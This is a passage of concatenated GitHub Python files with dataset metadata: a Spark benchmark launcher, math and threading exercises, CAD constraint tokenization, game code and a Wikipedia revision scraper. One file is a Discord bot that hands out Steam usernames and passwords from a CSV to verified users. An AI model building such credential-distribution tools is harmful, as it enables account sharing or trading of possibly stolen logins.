output-format arguments can be omitted to run the benchmark and collect\n results to the driver rather than write the query output to disk.\n\n This benchmark script assumes that the following environment variables have been set for\n the location of the relevant JAR files to be used:\n\n - SPARK_RAPIDS_PLUGIN_JAR\n - SPARK_RAPIDS_PLUGIN_INTEGRATION_TEST_JAR\n - CUDF_JAR\n\n \"\"\"\n\n parser = argparse.ArgumentParser(description='Run TPC benchmarks.')\n parser.add_argument('--benchmark', required=True,\n help='Name of benchmark to run (tpcds, tpcxbb, tpch)')\n parser.add_argument('--template', required=True,\n help='Path to a template script that invokes spark-submit')\n parser.add_argument('--input', required=True,\n help='Path to source data set')\n parser.add_argument('--input-format', required=True,\n help='Format of input data set (parquet or csv)')\n parser.add_argument('--append-dat', required=False, action='store_true',\n help='Append .dat to path (for tpcds only)')\n parser.add_argument('--output', required=False,\n help='Path to write query output to')\n parser.add_argument('--output-format', required=False,\n help='Format to write to (parquet or orc)')\n parser.add_argument('--configs', required=True, type=str, nargs='+',\n help='One or more configuration filenames to run')\n parser.add_argument('--query', required=True, type=str, nargs='+',\n help='Queries to run')\n parser.add_argument('--iterations', required=False,\n help='The number of iterations to run (defaults to 1)')\n parser.add_argument('--gc-between-runs', required=False, action='store_true',\n help='Whether to call System.gc between iterations')\n parser.add_argument('--upload-uri', required=False,\n help='Upload URI for summary output')\n\n args = parser.parse_args()\n\n with open(args.template, \"r\") as myfile:\n template = myfile.read()\n\n for config_name in args.configs:\n config = load_properties(config_name + \".properties\")\n for query in args.query:\n summary_file_prefix = \"{}-{}\".format(args.benchmark, config_name)\n\n cmd = ['--conf spark.app.name=\"' + summary_file_prefix + '\"']\n for k, v in config.items():\n cmd.append(\"--conf \" + k + \"=\" + v)\n\n cmd.append(\"--jars $SPARK_RAPIDS_PLUGIN_JAR,$CUDF_JAR,$SCALLOP_JAR\")\n cmd.append(\"--class com.nvidia.spark.rapids.tests.BenchmarkRunner\")\n cmd.append(\"$SPARK_RAPIDS_PLUGIN_INTEGRATION_TEST_JAR\")\n cmd.append(\"--benchmark \" + args.benchmark)\n cmd.append(\"--query \" + query)\n cmd.append(\"--input \" + args.input)\n cmd.append(\"--input-format {}\".format(args.input_format))\n\n if args.append_dat is True:\n cmd.append(\"--append-dat \")\n\n if args.output is not None:\n cmd.append(\"--output \" + args.output + \"/\" + config_name + \"/\" + query)\n\n if args.output_format is not None:\n cmd.append(\"--output-format {}\".format(args.output_format))\n\n cmd.append(\"--summary-file-prefix \" + summary_file_prefix)\n\n if args.gc_between_runs is True:\n cmd.append(\"--gc-between-runs \")\n\n if args.upload_uri is not None:\n cmd.append(\"--upload-uri \" + args.upload_uri)\n\n if args.iterations is None:\n cmd.append(\"--iterations 1\")\n else:\n cmd.append(\"--iterations {}\".format(args.iterations))\n\n cmd = template.strip() + \"\\n \" + \" \".join(cmd).strip()\n\n # run spark-submit\n print(cmd)\n os.system(cmd)\n\n\ndef load_properties(filename):\n myvars = {}\n with open(filename) as myfile:\n for line in myfile:\n name, var = line.partition(\"=\")[::2]\n myvars[name.strip()] = var.strip()\n return myvars\n\nif __name__ == '__main__':\n main()\n","repo_name":"barnes88/rapids-bench","sub_path":"benchmark.py","file_name":"benchmark.py","file_ext":"py","file_size_in_byte":5706,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"41485890933","text":"import threading\n\nclass StrLengthThread(threading.Thread):\n\n total_str_length = 0\n\n def __init__(self, word):\n threading.Thread.__init__(self)\n if type(word) != str:\n raise Exception(\"word is not a string\")\n self.__word = word\n\n def run(self):\n StrLengthThread.total_str_length += len(self.__word)\n","repo_name":"rickharris-dev/holbertonschool-higher_level_programming","sub_path":"divide_and_rule/h_str_length.py","file_name":"h_str_length.py","file_ext":"py","file_size_in_byte":346,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"32"} +{"seq_id":"20834524039","text":"# -*- Mode: Python\n\ndef egcd (a, b):\n if a == 0:\n return b, 0, 1\n else:\n q, r = divmod (b, a)\n g, y, x = egcd (r, a)\n return g, x - q * y, y\n\nclass NoInverse (Exception):\n pass\n\ndef modinv (a, p):\n if a < 0:\n return p - modinv (-a, p)\n else:\n g, x, y = egcd (a, p)\n if g != 1:\n raise NoInverse (a)\n else:\n return x % p\n\ndef mod (n, m):\n r = n % m\n if r < 0:\n return n - r\n else:\n return r\n\nclass Monty:\n def __init__ (self, N, R):\n self.N = N\n self.R = R\n self.R1 = modinv (R, N)\n self.N1 = (self.R1 * R) // N\n self.R2N = (R * R) % N\n #print(\"N = %s\" % i2b(self.N))\n\n def redc (self, T):\n m = mod (mod (T, self.R) * self.N1, self.R)\n t = (T + m * self.N) // self.R\n if not t < self.N:\n return t - self.N\n else:\n return t\n\n def tm (self, a):\n return mod (a * self.R, self.N)\n\n def fm (self, a):\n return self.redc (a)\n\ndef full_monty(i, j):\n mP = Monty (1021, 1024)\n iP = mP.tm (i)\n jP = mP.tm (j)\n s = mP.fm (iP + jP)\n assert s == mod (i + j, 1021)\n d = mP.fm (iP - jP)\n assert d == mod (i - j, 1021)\n p = mP.fm (mP.redc (iP * jP))\n assert p == mod (i * j, 1021)\n\ndef i2b(i):\n return format(i, '#016b')\n\nif __name__ == '__main__':\n full_monty(0, 0)\n full_monty(512, 512)\n full_monty(123, 321)\n full_monty(1023, 1023)\n","repo_name":"stnbu/sandbox","sub_path":"redc.py","file_name":"redc.py","file_ext":"py","file_size_in_byte":1492,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"26797425615","text":"def get_initials(fullname):\n #initials, uppercase\n accum = 0\n new_string = \"\"\n words = fullname.split(\" \")\n for i in words:\n first_letter = (words[accum][0]) \n first_letter = first_letter.capitalize()\n new_string = new_string+first_letter\n accum = accum + 1\n return new_string\ndef main():\n x = get_initials(fullname)\n print(\"The initials of '\"+fullname+\"' are \"+x+\".\")\n \nif __name__==\"__main__\":\n main()\n\n\n\n \n \n","repo_name":"wintaye/build-a-blog2","sub_path":"initials/initials.py","file_name":"initials.py","file_ext":"py","file_size_in_byte":477,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"35886631637","text":"\"\"\"This module handles constraint dataset functionality including tokenization.\n\"\"\"\n\nimport copy\nimport dataclasses\nimport enum\nfrom typing import Dict, Optional, Sequence\n\nimport numpy as np\nimport pytorch_lightning\nimport torch\nimport torch.utils.data\n\nimport sketchgraphs.data as datalib\nfrom sketchgraphs.data import flat_array\n\nfrom img2cad import noise_models, data_utils, dataset, modules, primitives_data\nfrom img2cad.dataset import _pad_or_truncate_to_length, NON_COORD_TOKEN\n\n\n# Constraint coord tokens indicate parameter type (only reference params atm)\nCONSTRAINT_COORD_TOKENS = [NON_COORD_TOKEN+1, NON_COORD_TOKEN+2] # [2, 3]\n\n@dataclasses.dataclass\nclass PrimitiveNoiseConfig:\n \"\"\"Configuration for primitive noise model.\n The primitive noise is implemented as a truncated normal noise.\n\n Attributes\n ----------\n enabled : bool\n Whether to use primitive noise model\n std : float\n Standard deviation of noise to add\n max_difference : float\n Maximum difference between noisy coordinate and original coordinate.\n \"\"\"\n enabled: bool = True\n std: float = 0.15\n max_difference: float = 0.15\n\n\nclass Token(enum.IntEnum):\n \"\"\"Enumeration indicating the non-parameter value tokens of ConstraintModel.\n\n At the moment, only categorical constraints are considered.\n \"\"\"\n Pad = 0\n Start = 1\n Stop = 2\n Coincident = 3\n Concentric = 4\n Equal = 5\n Fix = 6\n Horizontal = 7\n Midpoint = 8\n Normal = 9\n Offset = 10\n Parallel = 11\n Perpendicular = 12\n Quadrant = 13\n Tangent = 14\n Vertical = 15\n\n\n\ndef tokenize_constraints(seq: datalib.ConstructionSequence, gather_idxs: Sequence[int], max_length: Optional[int]=None):\n \"\"\"Tokenizes the constraints in a sketch construction sequence.\n\n Parameters\n ----------\n seq : datalib.ConstructionSequence\n The sketch construction sequence to tokenize.\n gather_idxs : Sequence[int]\n Indices produced by `dataset.tokenize_sketch` used to track entity tokens.\n max_length : Optional[int]\n If not `None`, truncates the sequence to this length.\n \"\"\"\n val_tokens = [Token.Start]\n coord_tokens = [NON_COORD_TOKEN]\n pos_idx = 1 # 0 is reserved for padding\n pos_tokens = [pos_idx]\n\n # Iterate through edge ops\n for op in seq:\n # Ensure op is applicable edge op\n if not isinstance(op, datalib.EdgeOp):\n continue\n if not op.label.name in Token.__members__:\n continue\n refs = op.references\n if 0 in refs: # skip external constraints\n continue\n\n # Add constraint type tokens\n val_tokens.append(Token[op.label.name])\n coord_tokens.append(NON_COORD_TOKEN)\n pos_idx += 1\n pos_tokens.append(pos_idx)\n\n # Add reference parameters\n val_tokens.extend(\n [gather_idxs[ref] + len(Token) for ref in sorted(refs)])\n coord_tokens.extend(CONSTRAINT_COORD_TOKENS[:len(refs)])\n pos_tokens.extend([pos_idx] * len(refs))\n val_tokens.append(Token.Stop)\n coord_tokens.append(NON_COORD_TOKEN)\n pos_tokens.append(pos_idx+1)\n\n sample = {\n 'val': _pad_or_truncate_to_length(np.array(val_tokens, dtype=np.int64), max_length),\n 'coord': _pad_or_truncate_to_length(np.array(coord_tokens, dtype=np.int64), max_length),\n 'pos': _pad_or_truncate_to_length(np.array(pos_tokens, dtype=np.int64), max_length)\n }\n\n return sample\n\n\ndef apply_primitive_noise(sketch: datalib.Sketch, std: float=0.15, max_difference: float=0.15) -> datalib.Sketch:\n noise_sketch = copy.deepcopy(sketch)\n try:\n noise_models.noisify_sketch_ents(noise_sketch, std=std, max_diff=max_difference)\n except:\n noise_sketch = sketch\n return noise_sketch\n\n\nclass ConstraintDataset(torch.utils.data.Dataset[Dict[str, torch.Tensor]]):\n \"\"\"Constraint generation dataset.\"\"\"\n\n def __init__(self, sequence_file: str, num_bins: int, max_length: Optional[int]=None,\n primitive_noise_config: PrimitiveNoiseConfig=None, tokenize: bool=True):\n \"\"\"Create a new constraint dataset.\n\n Parameters\n ----------\n sequence_file : str\n Path to the sequence file to load.\n num_bins : int\n Number of bins for positional quantization.\n max_length : int, optional\n Length to which to pad or truncate sequence tokens.\n primitive_noise_config : PrimitiveNoiseConfig, optional\n If not `None`, configuration for the primitive noise to apply.\n tokenize : bool\n If `True` (default), indicates that the sketches should be tokenized into\n primitive and constraint token sequences. Otherwise, simply returns the sketch\n (with potential primitive noise applied).\n \"\"\"\n\n if primitive_noise_config is None:\n primitive_noise_config = PrimitiveNoiseConfig(enabled=False)\n\n self.primitive_noise_config = primitive_noise_config\n self.num_bins = num_bins\n self.max_length = max_length\n\n self.sequences = flat_array.load_dictionary_flat(sequence_file)['sequences']\n self.tokenize = tokenize\n\n def __getitem__(self, idx: int) -> Dict[str, torch.Tensor]:\n seq = self.sequences[idx]\n\n sketch = datalib.sketch_from_sequence(seq)\n data_utils.normalize_sketch(sketch)\n\n if self.primitive_noise_config.enabled:\n sketch = apply_primitive_noise(sketch, self.primitive_noise_config.std, self.primitive_noise_config.max_difference)\n\n if not self.tokenize:\n return sketch\n\n sample, gather_idx = dataset.tokenize_sketch(sketch, self.num_bins, self.max_length)\n c_sample = tokenize_constraints(seq, gather_idx, self.max_length)\n c_sample = {f'c_{k}': v for k, v in c_sample.items()}\n\n sample = {\n **sample,\n **c_sample\n }\n\n sample = {k: torch.from_numpy(v) for k, v in sample.items()}\n return sample\n\n def __len__(self) -> int:\n return len(self.sequences)\n\n\n@dataclasses.dataclass\nclass ConstraintDataConfig(primitives_data.PrimitiveDataConfig):\n max_token_length: int = 130\n primitive_noise: PrimitiveNoiseConfig = PrimitiveNoiseConfig(enabled=True)\n\n\nclass ConstraintDataModule(pytorch_lightning.LightningDataModule):\n def __init__(self, config: ConstraintDataConfig, batch_size: int, num_workers: int=8):\n super().__init__()\n\n self.batch_size = batch_size\n self.config = config\n self.num_workers = num_workers\n\n self._dataset = None\n self._train_dataset = None\n self._valid_dataset = None\n self._test_dataset = None\n\n def setup(self, stage: Optional[str]=None) -> None:\n self._dataset = ConstraintDataset(\n self.config.sequence_path,\n self.config.num_position_bins,\n self.config.max_token_length,\n self.config.primitive_noise)\n\n self._train_dataset, self._valid_dataset, self._test_dataset = primitives_data.split_dataset(\n self._dataset, self.config.validation_fraction, self.config.test_fraction)\n\n def _make_dataloader(self, dataset, shuffle: bool) -> torch.utils.data.DataLoader[modules.TokenInput]:\n if dataset is None:\n return None\n\n return torch.utils.data.DataLoader(\n dataset, self.batch_size,\n shuffle=shuffle, num_workers=self.num_workers,\n pin_memory=False,\n persistent_workers=self.num_workers > 0)\n\n def train_dataloader(self) -> torch.utils.data.DataLoader[modules.TokenInput]:\n return self._make_dataloader(self._train_dataset, shuffle=True)\n\n def val_dataloader(self) -> Optional[torch.utils.data.DataLoader[modules.TokenInput]]:\n return self._make_dataloader(self._valid_dataset, shuffle=False)\n\n def test_dataloader(self) -> Optional[torch.utils.data.DataLoader[modules.TokenInput]]:\n return self._make_dataloader(self._test_dataset, shuffle=False)\n\n @property\n def train_dataset_size(self) -> int:\n return len(self._train_dataset)\n\n","repo_name":"PrincetonLIPS/vitruvion","sub_path":"img2cad/constraint_data.py","file_name":"constraint_data.py","file_ext":"py","file_size_in_byte":8145,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"32"} +{"seq_id":"20820213334","text":"import discord\nfrom discord.ext import commands\nimport random\nimport os\nimport csv\nfrom discord.ext.commands import BucketType\nfrom discord.ext.commands import cooldown\nimport psycopg2\n\nintents = discord.Intents(messages = True, guilds = True, reactions = True, members = True, presences = True)\nclient = commands.Bot(command_prefix = '.', intents = intents)\nclient.remove_command('help')\nDATABASE_URL = os.environ['DATABASE_URL']\ncon = psycopg2.connect(DATABASE_URL, sslmode='require')\ncur = con.cursor()\n\n#Variables\nlineCount = None\n\n#Events\n@client.event\nasync def on_ready():\n global lineCount\n global con\n global cur\n print(\"Bot is online.\")\n await client.change_presence(activity=discord.Game(name=\"Type .help for help\"))\n cur.execute(\"select * from variables\")\n tableData = cur.fetchall()\n for row in tableData:\n lineCount = row[1]\n print(\"lineCount has been set to: \" + str(lineCount))\n cur.execute(\"drop table if exists steamAccounts\")\n cur.execute(\"create table steamAccounts (id int, username varchar(50), password varchar(50))\")\n with open('steam_accounts.csv', 'r') as f:\n reader = csv.reader(f)\n for row in reader:\n cur.execute(\n \"insert into steamAccounts values (%s, %s, %s)\",\n row)\n print(\"steam accounts imported\")\n con.commit()\n \n\n#Commands\n@client.command()\nasync def help(ctx):\n await ctx.send(\"Use the '.getSteamAcc @yourNameHere' to get an account\")\n\n@client.command()\n@cooldown(1, 3600, BucketType.user)\nasync def getSteamAcc(ctx, author):\n global lineCount\n global con\n global cur\n if \"verified\" in [i.name.lower() for i in ctx.author.roles]:\n lineCount = lineCount + 1\n print(\"lineCount is now: \" + str(lineCount))\n cur.execute(\"select * from steamAccounts\")\n tableData = cur.fetchall()\n loop = 0\n for row in tableData:\n loop = loop + 1\n if loop == lineCount:\n if row[1] == \"\":\n await ctx.send(\"There are no more accounts availiable. Contact @MaximumFire for help.\")\n else:\n await ctx.author.send(\"Your username is: \" + row[1])\n await ctx.author.send(\"Your password is: \" + row[2])\n cur.execute(\"select * from variables\")\n newLineCount = lineCount\n cur.execute(\"update variables set value = %s where variable = 'lineCount'\", [newLineCount])\n cur.execute(\"select * from variables\")\n tableData = cur.fetchall()\n for row in tableData:\n lineCount = row[1]\n con.commit()\n else:\n await ctx.send(\"This Command is only availiable for @verified\")\n\n@getSteamAcc.error\nasync def getSteamAcc_error(ctx, error):\n if isinstance(error, commands.CommandOnCooldown):\n msg = 'This command has a cooldown, please try again in {:.2f}s'.format(error.retry_after)\n await ctx.send(msg)\n elif isinstance(error, commands.MissingRequiredArgument):\n if error.param.name == 'author':\n await ctx.send(\"Please @ yourself after the command. For example: '.getSteamAcc @MaximumFire'\")\n getSteamAcc.reset_cooldown(ctx)\n else:\n raise error\n getSteamAcc.reset_cooldown(ctx)\n\n@client.command()\nasync def clearCooldown(ctx):\n if \"owner\" in [i.name.lower() for i in ctx.author.roles]:\n getSteamAcc.reset_cooldown(ctx)\n await ctx.send(\"Cooldown reset.\")\n else:\n await ctx.send(\"This command is only for owner.\")\n \n@client.command()\nasync def setLineCount(ctx, *, number):\n if \"owner\" in [i.name.lower() for i in ctx.author.roles]:\n global lineCount\n global con\n global cur\n cur.execute(\"select * from variables\")\n newLineCount = number\n cur.execute(\"update variables set value = %s where variable = 'lineCount'\", [newLineCount])\n cur.execute(\"select * from variables\")\n tableData = cur.fetchall()\n for row in tableData:\n lineCount = row[1]\n await ctx.send(\"lineCount has been updated to: \" + str(lineCount))\n print(\"lineCount is: \" + str(lineCount))\n con.commit()\n else:\n await ctx.send(\"This command is only for owner.\")\n\n@client.command()\nasync def checkLineCount(ctx):\n if \"owner\" in [i.name.lower() for i in ctx.author.roles]:\n global line_count\n print(\"line_count is: \" + str(lineCount))\n await ctx.send(\"lineCount is: \" + str(lineCount))\n else:\n await ctx.send(\"This command is only for owner.\")\n \nclient.run(os.environ['discord_token'])\ncon.commit()\ncur.close()\ncon.close()\n","repo_name":"MaximumFire/steamaccounts","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":4648,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"27288412481","text":"# -*- coding: utf-8 -*-\nfrom .models import Notification\n\n\ndef notifications(request):\n data = {}\n if request.user.is_authenticated():\n notifications = (\n Notification.objects.filter(is_draft=False)\n .order_by(\"-added\")\n .only(\"level\", \"title\", \"short_text\", \"added\")[:2]\n )\n data.update({\"notifications\": notifications})\n return data\n","repo_name":"toxinu/sublimall-server","sub_path":"sublimall/notifications/context_processors.py","file_name":"context_processors.py","file_ext":"py","file_size_in_byte":398,"program_lang":"python","lang":"en","doc_type":"code","stars":42,"dataset":"github-code","pt":"32"} +{"seq_id":"33130156447","text":"from math import cos, sin, radians\n\nimport pygame\n\n\ndef player_aim(self):\n \"\"\"\n Manual player aim control for range attack\n \"\"\"\n shoot_text = \"\"\n shoot_ready = [0, 0]\n has_ammo = [0, 0]\n shoot_ready_list = [[], []]\n self.battle_ui_updater.add(self.single_text_popup)\n base_target_pos = self.command_cursor_pos\n target_pos = self.base_cursor_pos\n\n who_shoot = ()\n if self.player_input_state == \"leader aim\":\n who_shoot = (self.player_char,)\n elif self.player_input_state == \"line aim\" or self.player_input_state == \"focus aim\":\n who_shoot = self.player_char.alive_troop_follower\n\n for this_subunit in who_shoot:\n can_shoot = [False, False]\n this_subunit.manual_shoot = True\n if this_subunit.in_melee_combat_timer == 0 and \"uncontrollable\" not in this_subunit.current_action and \\\n \"uncontrollable\" not in this_subunit.command_action and \"weapon\" not in this_subunit.current_action and \\\n \"weapon\" not in this_subunit.command_action:\n\n if self.player_input_state == \"line aim\":\n angle = self.player_char.set_rotate(self.command_cursor_pos)\n distance = self.player_char.base_pos.distance_to(self.command_cursor_pos)\n base_target_pos = pygame.Vector2(\n this_subunit.base_pos[0] - (distance * sin(radians(angle))),\n this_subunit.base_pos[1] - (distance * cos(radians(angle))))\n target_pos = (base_target_pos[0] * 5 * self.screen_scale[0],\n base_target_pos[1] * 5 * self.screen_scale[1])\n\n for weapon in (0, 1):\n if this_subunit.equipped_weapon in this_subunit.ammo_now:\n if weapon in this_subunit.ammo_now[this_subunit.equipped_weapon]:\n has_ammo[weapon] += 1\n if this_subunit.ammo_now[this_subunit.equipped_weapon][weapon] > 0 and \\\n this_subunit.shoot_range[weapon] >= this_subunit.base_pos.distance_to(\n base_target_pos) and \\\n ((this_subunit.move_speed and this_subunit.shoot_while_moving and\n not this_subunit.check_special_effect(\"Stationary\", weapon=weapon)) or\n not this_subunit.move_speed):\n shoot_ready_list[weapon].append(this_subunit)\n shoot_ready[weapon] += 1\n can_shoot[weapon] = True\n\n if True in can_shoot:\n if this_subunit.shoot_line not in self.battle_camera: # add back shoot line\n self.battle_camera.add(this_subunit.shoot_line)\n this_subunit.shoot_line.update(base_target_pos, target_pos, can_shoot)\n else: # no weapon in current equipped weapon set\n if this_subunit.shoot_line in self.battle_camera: # remove shoot line\n self.battle_camera.remove(this_subunit.shoot_line)\n\n shoot_text = str(shoot_ready[0]) + \"/\" + str(has_ammo[0]) + \", \" + str(shoot_ready[1]) + \"/\" + str(has_ammo[1])\n\n self.single_text_popup.pop(self.cursor.rect.bottomright, shoot_text)\n\n if self.player_key_press[\"Order Menu\"] or not self.player_char.alive:\n # Cancel manual aim with order menu input or player die\n self.player_cancel_input()\n\n elif self.player_key_press[\"Main Weapon Attack\"] or self.player_key_press[\"Sub Weapon Attack\"]:\n weapon = 0\n if self.player_key_press[\"Sub Weapon Attack\"]:\n weapon = 1\n if shoot_ready[weapon] > 0:\n for this_subunit in shoot_ready_list[weapon]:\n if \"movable\" in this_subunit.current_action and \"charge\" not in this_subunit.current_action:\n # shoot while moving\n this_subunit.show_frame = 0 # just restart frame\n if \"walk\" in this_subunit.current_action:\n this_subunit.current_action = this_subunit.range_walk_command_action[weapon]\n elif \"run\" in this_subunit.current_action:\n this_subunit.current_action = this_subunit.range_run_command_action[weapon]\n else:\n this_subunit.new_angle = this_subunit.set_rotate(this_subunit.shoot_line.base_target_pos)\n this_subunit.command_action = this_subunit.range_attack_command_action[weapon]\n this_subunit.attack_pos = this_subunit.shoot_line.base_target_pos\n\n else:\n self.camera_process()\n self.player_char.player_input(self.command_cursor_pos)\n","repo_name":"remance/Masendor-backup","sub_path":"gamescript/common/battle/player_aim.py","file_name":"player_aim.py","file_ext":"py","file_size_in_byte":4668,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"71353541850","text":"from mw import api\nimport re\nimport json\nimport collections\nimport sys\n\ncompare = lambda x, y: collections.Counter(x) == collections.Counter(y)\n\nsession = api.Session(\"https://en.wikipedia.org/w/api.php\", user_agent='Mozilla/5.0')\n\ni=0\n\ntitle = sys.argv[1]\nstart = sys.argv[2]\nend = sys.argv[3]\nlimit = int(sys.argv[4])\noffset = sys.argv[5]\n\nif offset == \"no\":\n revisions = session.revisions.query(\n properties={'ids', 'content', 'timestamp', 'user', 'userid', 'tags', 'size'},\n titles={title},\n direction=\"newer\",\n limit=limit,\n start=start,\n end=end\n # parse= 'true'\n )\n\nelse:\n revisions = session.revisions.query(\n properties={'ids', 'content', 'timestamp', 'user', 'userid', 'tags', 'size'},\n titles={title},\n direction=\"newer\",\n limit=limit,\n start_id=offset,\n end=end\n # parse= 'true'\n )\n\n\n\ncache = []\ngen = {}\nallrevisions = []\n\nfor rev in revisions:\n i+=1\n lerev = {}\n #print('Timtestamp: ' + rev['timestamp'])\n #print (rev['*'])\n if '*' in rev.keys():\n match = re.findall(r'\\[\\[Category.+\\]\\]', rev['*'])\n categories = []\n for cat in match:\n # do something with each found email string\n\n cat=cat.replace(\"| \", \"\")\n cat=cat.replace(\"[\", \"\")\n cat=cat.replace(\"]\", \"\")\n cat=cat.replace(\" \", \"_\")\n cat=cat[9:]\n categories.append(cat)\n\n if categories:\n if not compare(categories, cache):\n #print(\"Pas les mêmes\")\n #print(categories)\n lerev['categories'] = categories\n cache=categories\n lerev['revid'] = rev['revid']\n lerev['user'] = rev['user']\n lerev['userid'] = rev['userid']\n lerev['timestamp'] = rev['timestamp']\n lerev['tag'] = rev['tags']\n lerev['size'] = rev['size']\n if 'minor' in rev:\n lerev['minor'] = rev['minor']\n allrevisions.append(lerev)\n\n\nif offset != \"no\":\n allrevisions.pop(0)\n\n\ngen[\"revisions\"] = allrevisions;\n#gen[\"continue\"] = '';\nprint(json.dumps(gen))\n#print(i)\n","repo_name":"froulet/entityspotlight","sub_path":"web/getrevisions.py","file_name":"getrevisions.py","file_ext":"py","file_size_in_byte":2193,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"10921451707","text":"import numpy as np\r\nfrom global_vals import *\r\nimport time\r\nclass GameObject():\r\n def __init__(self, art, scene, x, y, fore = 'WHITE', back = 'BLACK'): \r\n self._fore = fore\r\n self._back = back\r\n self._width = 0\r\n self._height = 0\r\n self._velx = VELX\r\n self._scene = scene\r\n self._display = scene.display\r\n art = art.split('\\n')\r\n for i in art:\r\n self._height += 1\r\n if len(i) > self._width:\r\n self._width = len(i)\r\n\r\n assert x + self._width < WIDTH and SKY <= y < HEIGHT\r\n\r\n self._art_box = np.full((self._height, self._width), (' '))\r\n for i in range(len(art)):\r\n self._art_box[i, :] = list(art[i]) + [' '] * (self._width - len(art[i]))\r\n self._x = x \r\n self._y = y\r\n \r\n \r\n def move_left(self):\r\n if self._x - self._velx > PLAYER_INIT[0]:\r\n self._scene.remove_from_scene(self)\r\n self._x -= self._velx\r\n self._scene.add_to_scene(self)\r\n else:\r\n self._scene.remove_from_scene(self, permanent = True)\r\n\r\n def get_x(self):\r\n return self._x\r\n \r\n def get_y(self):\r\n return self._y\r\n \r\n def get_height(self):\r\n return self._height\r\n\r\n def get_width(self):\r\n return self._width\r\n\r\n def get_art_box(self):\r\n return self._art_box \r\n\r\nclass PewPew(GameObject):\r\n\r\n def __init__(self, scene, x, y, fore = 'WHITE', back = 'BLACK'):\r\n super().__init__(PEW, scene, x, y, fore, back)\r\n self._velx = PEW_VEL\r\n \r\n def check_collisions(self):\r\n for i in self._scene.get_beams():\r\n if not (self.get_x() + self.get_width() <= i.get_x() or i.get_x() + i.get_width() <= self.get_x() or self.get_y() < i.get_y() - i.get_height() or i.get_y() < self.get_y() - self.get_height()): \r\n self._scene.remove_from_scene(i, permanent = True)\r\n self._scene.remove_from_scene(self, permanent = True)\r\n return True\r\n return False\r\n \r\n def move_right(self):\r\n if self._x + self._velx + self._width < WIDTH:\r\n self._scene.remove_from_scene(self)\r\n self._x += self._velx\r\n if not self.check_collisions():\r\n self._scene.add_to_scene(self)\r\n else:\r\n self._scene.remove_from_scene(self ,permanent = True)\r\n\r\n\r\nclass Player(GameObject):\r\n def __init__(self, scene, art = MANDO_SPRITE, fore = 'WHITE', back = 'BLACK'):\r\n super().__init__(art, scene, *PLAYER_INIT, fore, back)\r\n self._vely = 0\r\n self._velx = 0\r\n self._score = 0\r\n self._lives = LIVES\r\n self._shield_active = False\r\n self._shield_start = None\r\n\r\n def move_right(self, force = ACCX):\r\n if self._x + self._velx + self._width + force < WIDTH and self._x + self._velx + force> PLAYER_INIT[0]:\r\n self._scene.remove_from_scene(self)\r\n self._velx += force\r\n if self._velx > MAX_VELX:\r\n self._velx = MAX_VELY\r\n self._x = self._x + self._velx\r\n # self._y = max(self._y + self._vely, SKY + self._height + 1) \r\n self.check_collisions()\r\n self._scene.add_to_scene(self)\r\n # self._scene.message_board(str(self._vely))\r\n else:\r\n self._velx = 0\r\n \r\n def move_left(self, force = ACCX):\r\n if self._x + self._velx + self._width - force < WIDTH and self._x + self._velx - force> PLAYER_INIT[0]:\r\n self._scene.remove_from_scene(self)\r\n self._velx -= force\r\n if self._velx < MIN_VELX:\r\n self._velx = MIN_VELY\r\n self._x = self._x + self._velx\r\n # self._y = max(self._y + self._vely, SKY + self._height + 1) \r\n self.check_collisions()\r\n self._scene.add_to_scene(self)\r\n else:\r\n self._velx = 0\r\n\r\n \r\n def move_vertically(self):\r\n if self.get_y() + self._vely < HEIGHT and self.get_y() + self._vely - self.get_height()> SKY:\r\n self._scene.remove_from_scene(self)\r\n self._y += self._vely\r\n self.check_collisions()\r\n self._scene.add_to_scene(self)\r\n return True\r\n return False\r\n\r\n def check_collisions(self):\r\n for i in self._scene.get_coins():\r\n if not (self.get_x() + self.get_width() <= i.get_x() or i.get_x() + i.get_width() <= self.get_x() or self.get_y() < i.get_y() - i.get_height() or i.get_y() < self.get_y() - self.get_height()): \r\n self._score += 10\r\n self._scene.remove_from_scene(i, permanent = True)\r\n\r\n for i in self._scene.get_beams():\r\n if not (self.get_x() + self.get_width() <= i.get_x() or i.get_x() + i.get_width() <= self.get_x() or self.get_y() < i.get_y() - i.get_height() or i.get_y() < self.get_y() - self.get_height()): \r\n self._scene.remove_from_scene(i, permanent = True)\r\n if not self.shield_active():\r\n self._lives -= 1\r\n time.sleep(0.5)\r\n\r\n for i in self._scene.get_speedups():\r\n if not (self.get_x() + self.get_width() <= i.get_x() or i.get_x() + i.get_width() <= self.get_x() or self.get_y() < i.get_y() - i.get_height() or i.get_y() < self.get_y() - self.get_height()): \r\n self._scene.remove_from_scene(i, permanent = True)\r\n self._scene.do_speedup()\r\n \r\n \r\n def pull(self, x, y, force):\r\n if abs(self._x - x) <= MAG_RANGE_X and abs(self._y - y) <= MAG_RANGE_Y:\r\n if self._x - x > 0:\r\n self.move_left(force)\r\n elif self._x + self._width - x < 0: \r\n self.move_right(force)\r\n\r\n if self._y - self._height - y > 0:\r\n self._vely = min(MIN_VELY, self._vely - force)\r\n elif self._y - y < 0:\r\n self._vely = max(MAX_VELY, self._vely + force)\r\n self.move_vertically()\r\n \r\n def reset_velx(self):\r\n self._velx = 0\r\n\r\n def jet(self):\r\n if self.get_y() + self._vely - ACCY < HEIGHT and self.get_y() + self._vely - ACCY - self.get_height()> SKY:\r\n self._scene.remove_from_scene(self)\r\n self._vely -= ACCY\r\n if self._vely < -3:\r\n self._vely = -3\r\n self._y = self._y + self._vely\r\n # self._y = max(self._y + self._vely, SKY + self._height + 1) \r\n self.check_collisions()\r\n self._scene.add_to_scene(self)\r\n self._scene.message_board(str(self._vely))\r\n else:\r\n self._vely = 0\r\n \r\n\r\n def gravity(self): \r\n if self.get_y() + self._vely + GRAVITY < HEIGHT and self.get_y() + self._vely + GRAVITY - self.get_height() > SKY:\r\n self._scene.remove_from_scene(self)\r\n 